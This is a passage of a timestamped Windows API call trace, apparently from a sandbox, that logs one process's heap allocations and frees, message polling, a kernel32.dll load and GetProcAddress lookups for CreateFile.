lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0036.619] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0036.619] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.620] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.620] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.620] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.620] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.621] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0036.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0036.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5c8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c898 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0036.621] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.624] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.626] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.626] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c8c8 [0036.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c8c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.626] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.627] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.627] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.627] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0036.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 